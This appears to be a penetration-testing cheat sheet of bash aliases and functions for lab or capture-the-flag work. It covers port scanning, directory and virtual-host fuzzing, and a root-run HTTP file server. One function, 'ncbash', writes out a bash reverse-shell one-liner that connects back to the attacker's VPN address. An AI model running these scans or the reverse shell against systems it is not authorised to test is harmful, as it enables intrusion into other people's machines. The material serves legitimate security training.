Cheat Sheet


Aliases

# Serve the current working directory over HTTP on port 80. sudo is there
# because binding a port below 1024 needs elevated privileges, which also means
# the whole server process runs as root. http.server listens on every interface
# unless --bind is given, so any host that can reach this machine can read
# everything under the current directory while it runs.
# NOTE(review): consider --bind <vpn-address> and --directory <staging-dir>
# (placeholders) so only the intended files are exposed on the intended interface.
alias www='sudo python3 -m http.server 80'
# Open /etc/hosts in vim under sudo.
alias hosts='sudo vim /etc/hosts'
# Copy the tun0 IPv4 address to the X clipboard with the trailing newline removed.
# Takes field 10 of the "inet " line when split on single spaces, so it depends
# on the exact padding of ifconfig's output.
alias tun0cp="ifconfig tun0 | grep 'inet ' | cut -d' ' -f10 | tr -d '\n' | xclip -sel clip"
# Print the tun0 IPv4 address with no trailing newline (same parsing as tun0cp).
alias tun0="ifconfig tun0 | grep 'inet ' | cut -d' ' -f10 | tr -d '\n'"

nmapcv() {
    # Run nmap under sudo with default scripts and version detection (-sCV)
    # at -T4 timing, print the output and keep a copy in ./scans/nmap.
    # Arguments: targets and any extra nmap options, passed through unchanged.
    # tee has no -a, so scans/nmap is overwritten on every run.
    if [ ! -d "./scans" ]; then
        mkdir scans
    fi
    sudo nmap -sCV -T4 "$@" | tee scans/nmap
}

nmapall() {
    # Run nmap under sudo across all TCP ports (-p-) with --min-rate 1000 and
    # -T4 timing, print the output and keep a copy in ./scans/nmapall.
    # Arguments: targets and any extra nmap options, passed through unchanged.
    # tee has no -a, so scans/nmapall is overwritten on every run.
    test -d "./scans" || mkdir scans
    sudo nmap --min-rate 1000 -p- -T4 "$@" \
        | tee scans/nmapall
}

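rustall() {
    # Scan ports 0-65535 of one target with rustscan (--ulimit 5000, -t 9000);
    # the arguments after "--" (-sV -sC) are the ones rustscan forwards to nmap.
    # Arguments: $1 - target. Only $1 is used; further arguments are ignored.
    # Returns:   2 when no target is given, otherwise rustscan's status.
    if [ -z "${1:-}" ]; then
        printf 'usage: rustall <target>\n' >&2
        return 2
    fi
    # Quoted so the target reaches rustscan as one word, with no word
    # splitting or glob expansion against the current directory.
    rustscan -r 0-65535 --ulimit 5000 "$1" -t 9000 -- -sV -sC
}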

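ferobig () {
    # Run feroxbuster against http://<host> with the SecLists big.txt wordlist,
    # print the output and keep a copy in ./scans/ferobig.txt (overwritten on
    # each run). The scheme is fixed to http://.
    # Arguments: $1 - host (optionally with port/path) appended to "http://";
    #            remaining arguments are passed to feroxbuster unchanged.
    # Returns:   2 when no host is given, otherwise the pipeline's status.
    if [ "$#" -lt 1 ]; then
        printf 'usage: ferobig <host> [feroxbuster options]\n' >&2
        return 2
    fi
    # local keeps the target out of the interactive shell's global variables.
    local url="$1"
    shift
    # tee cannot create scans/ferobig.txt unless the directory already exists.
    mkdir -p scans
    feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt -u "http://$url" "$@" | tee scans/ferobig.txt
}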

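ferodir () {
    # Run feroxbuster against http://<host> with the SecLists
    # directory-list-2.3-small.txt wordlist, print the output and keep a copy
    # in ./scans/ferodir.txt (overwritten on each run). The scheme is fixed to
    # http://.
    # Arguments: $1 - host (optionally with port/path) appended to "http://";
    #            remaining arguments are passed to feroxbuster unchanged.
    # Returns:   2 when no host is given, otherwise the pipeline's status.
    if [ "$#" -lt 1 ]; then
        printf 'usage: ferodir <host> [feroxbuster options]\n' >&2
        return 2
    fi
    # local keeps the target out of the interactive shell's global variables.
    local url="$1"
    shift
    # tee cannot create scans/ferodir.txt unless the directory already exists.
    mkdir -p scans
    feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -u "http://$url" "$@" | tee scans/ferodir.txt
}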

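ferocom () {
    # Run feroxbuster against http://<host> with the SecLists common.txt
    # wordlist, print the output and keep a copy in ./scans/ferocom.txt
    # (overwritten on each run). The scheme is fixed to http://.
    # Arguments: $1 - host (optionally with port/path) appended to "http://";
    #            remaining arguments are passed to feroxbuster unchanged.
    # Returns:   2 when no host is given, otherwise the pipeline's status.
    if [ "$#" -lt 1 ]; then
        printf 'usage: ferocom <host> [feroxbuster options]\n' >&2
        return 2
    fi
    # local keeps the target out of the interactive shell's global variables.
    local url="$1"
    shift
    # tee cannot create scans/ferocom.txt unless the directory already exists.
    mkdir -p scans
    feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u "http://$url" "$@" | tee scans/ferocom.txt
}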

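ffufnames () {
    # Request http://<domain> with ffuf once per entry of the SecLists
    # namelist.txt wordlist, substituting the entry for FUZZ in the Host
    # header ("Host: FUZZ.<domain>"). Output goes to the terminal only.
    # Arguments: $1 - domain used both in the URL and in the Host header;
    #            remaining arguments are passed to ffuf unchanged.
    # Returns:   2 when no domain is given, otherwise ffuf's status.
    if [ "$#" -lt 1 ]; then
        printf 'usage: ffufnames <domain> [ffuf options]\n' >&2
        return 2
    fi
    # local keeps the target out of the interactive shell's global variables.
    local url="$1"
    shift
    ffuf -c -w /usr/share/seclists/Discovery/DNS/namelist.txt -u "http://$url" -H "Host: FUZZ.$url" "$@"
}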

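wfuzznames () {
    # Request http://<domain> with wfuzz once per entry of the SecLists
    # namelist.txt wordlist, substituting the entry for FUZZ in the Host
    # header ("Host: FUZZ.<domain>"). Output goes to the terminal only.
    # Arguments: $1 - domain used both in the URL and in the Host header;
    #            remaining arguments are passed to wfuzz unchanged.
    # Returns:   2 when no domain is given, otherwise wfuzz's status.
    if [ "$#" -lt 1 ]; then
        printf 'usage: wfuzznames <domain> [wfuzz options]\n' >&2
        return 2
    fi
    # local keeps the target out of the interactive shell's global variables.
    local url="$1"
    shift
    wfuzz -c -w /usr/share/seclists/Discovery/DNS/namelist.txt -u "http://$url" -H "Host: FUZZ.$url" "$@"
}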

ncbash () {
    # Start an nc listener on TCP port 1234 and feed it one line of text on
    # stdin; that line is built by echo and embeds the output of tun0 and the
    # port number 9001.
    # NOTE(review): nc -l is given no bind address here, so presumably the
    # listener is reachable from every network this host is attached to, not
    # only the lab VPN, and serves the line to whichever client connects - confirm.
    # NOTE(review): tun0 is defined in this file as an alias; whether it
    # resolves inside $( ) in a function depends on the shell and on the alias
    # existing before this function is read - confirm.
    echo "bash -i >& /dev/tcp/$(tun0)/9001 0>&1" | nc -lvnp 1234
}

Resources

0xdf

HackTricks

Ippsec.rocks

PayloadsAllTheThings

RevShells